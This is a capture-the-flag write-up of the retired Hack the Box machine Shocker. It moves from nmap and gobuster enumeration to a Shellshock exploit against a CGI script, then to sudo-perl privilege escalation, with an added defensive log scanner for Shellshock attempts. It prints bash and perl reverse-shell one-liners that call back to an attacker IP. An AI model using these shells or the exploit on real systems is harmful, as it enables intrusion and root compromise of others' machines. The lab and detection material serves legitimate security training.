Hack the Box Writeup - Shocker
This post is a guide to the retired Hack the Box system, Shocker. It takes us through initial enumeration all the way to gaining a root shell.
Today's post will take us through one of the easier retired boxes on Hack the Box: Shocker.
The IP address of the box is 10.10.10.56 so, as always, let's start with our initial enumeration.
Enumeration
We begin with nmap.
$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.56
The flags break down as follows:
- -sC : Run all default scripts
- -sV : Enumerate versions of software running on found ports
- -p- : Check all ports from 0 to 65535
- -oA : Save the output of the scan in all available formats
This gives us the following results:
As you can see, we have two ports open: port 80 running Apache and port 2222, which seems to be running ssh.
Running curl on port 80 returns us the following HTML:
<!DOCTYPE html>
<html>
<body>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
This shows that port 80 is in fact running a website, so let's have a dig at it with gobuster.
$ gobuster -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
The flags are for the following settings:
- -u : the URL of the host we wish to scan
- -w : which word-list we want to use
- -s : the response status codes we want to know about
- -x : the file extensions we wish to check each entry of our word-list with
- -t : the number of threads to run to speed things up a little bit
This finishes quite quickly with the following results:
We can see that there is a cgi-bin directory currently returning a 403 - Forbidden response code. So let's run gobuster again, but starting in that cgi-bin directory this time.
$ gobuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
Again, the results come back quite quickly, showing us a shell script called user.sh.
We can run curl on the newly found URL to verify it.
$ curl http://10.10.10.56/cgi-bin/user.sh
Given the output we receive back, it looks like the script is running some bash.
Now that we know we have a cgi script executing valid bash (and given the clue in the name of the machine), it seems that this machine is likely to be vulnerable to shellshock.
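From the defender's side, the same reasoning gives a detection: Apache copies client-supplied headers into CGI environment variables, and every Shellshock (CVE-2014-6271) payload begins with the bash function-definition string "() {". The following is an added example (not part of the original post) that scans Apache combined-format access log lines for that signature in the client-controlled fields; the log lines are constructed and the log format is assumed to be the default combined format.

```python
import re

# Apache "combined" log format (assumed default, no escaped quotes in fields):
# host ident authuser [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Every Shellshock payload starts with a bash exported-function definition,
# "() {"; tolerate the whitespace variants seen in the wild.
SHELLSHOCK = re.compile(r'\(\)\s*\{')
# Fields a remote client controls and Apache exports to CGI scripts as
# environment variables (REQUEST_URI/QUERY_STRING, HTTP_REFERER, HTTP_USER_AGENT).
CLIENT_FIELDS = ("request", "referer", "agent")

def parse_line(line):
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = COMBINED.match(line.strip())
    return m.groupdict() if m else None

def shellshock_field(entry):
    """Name of the first client-controlled field carrying a function definition, else None."""
    for field in CLIENT_FIELDS:
        if SHELLSHOCK.search(entry[field]):
            return field
    return None

def scan(lines):
    """Return (client host, requested path, offending field) for each suspicious line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        field = shellshock_field(entry)
        if field is None:
            continue
        parts = entry["request"].split(" ")
        path = parts[1] if len(parts) >= 2 else entry["request"]
        hits.append((entry["host"], path, field))
    return hits

# Constructed sample lines (not captured from the box). The second line carries
# the widely published CVE-2014-6271 test string in the User-Agent header.
SAMPLE_LOG = [
    '10.10.14.15 - - [10/Jan/2020:12:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.64.0"',
    '10.10.14.15 - - [10/Jan/2020:12:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo vulnerable"',
    '10.10.14.15 - - [10/Jan/2020:12:00:09 +0000] "GET /bug.jpg HTTP/1.1" 200 5467 "http://10.10.10.56/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, path, field in scan(SAMPLE_LOG):
        print(f"possible Shellshock attempt from {host} against {path} via {field}")
```

Only the second sample line is flagged; a patched bash (one that no longer imports functions from arbitrary environment variables) is the real fix, and this scan is how you spot attempts against the unpatched host in the meantime.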
Exploitation
A quick search of exploit-db gives us a likely script we can use.
https://www.exploit-db.com/exploits/34900/
However, looking at the code we can see that we will need to specify an extra parameter in order to make sure the exploit script can find our vulnerable cgi script on the server.
So download the script and run it as follows (modifying the lhost and lport params to fit your machine):
$ python shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4444 pages=/cgi-bin/user.sh
We get a shell, yay! :D
The id command shows that we are running as the user shelly, and a quick pwd shows that we need to change to the user's home directory to get hold of the user flag.
Getting a Better Shell
Now that we have a basic shell and the first user flag, we need to enumerate the system from our new point of view. However, the first thing I want to do is get a better and more stable shell. Using the very useful reverse-shell cheat-sheet on pentestmonkey (here), we can set up a netcat listener on our Kali box, and then run the following in our basic shell.
$ bash -i >& /dev/tcp/10.10.14.15/8888 0>&1
Then we can get a shell capable of job control by using a neat Python trick, except that the normal python binary doesn't seem to be on the machine. A quick locate python later, however, shows us that python3 is on there instead. So now we can run the following:
$ python3 -c "import pty; pty.spawn('/bin/bash');"
More Enumeration
With our shiny new, more stable, shell, we can begin further enumeration of this box to elevate our privileges to root. One of the first things I check, before running any scripts like LinEnum.sh, is to take a look at the sudoers file.
$ sudo -l
In this case, this gives us a big win immediately.
Privilege Escalation
This shows us that our current user can run the perl command using sudo without any password. So, referring back to the pentestmonkey cheat sheet, we can find a perl reverse shell, set up another netcat listener on a different port, then just run the perl one-liner using sudo.
$ sudo perl -e 'use Socket;$i="10.10.14.15";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
Winner, winner, chicken dinner!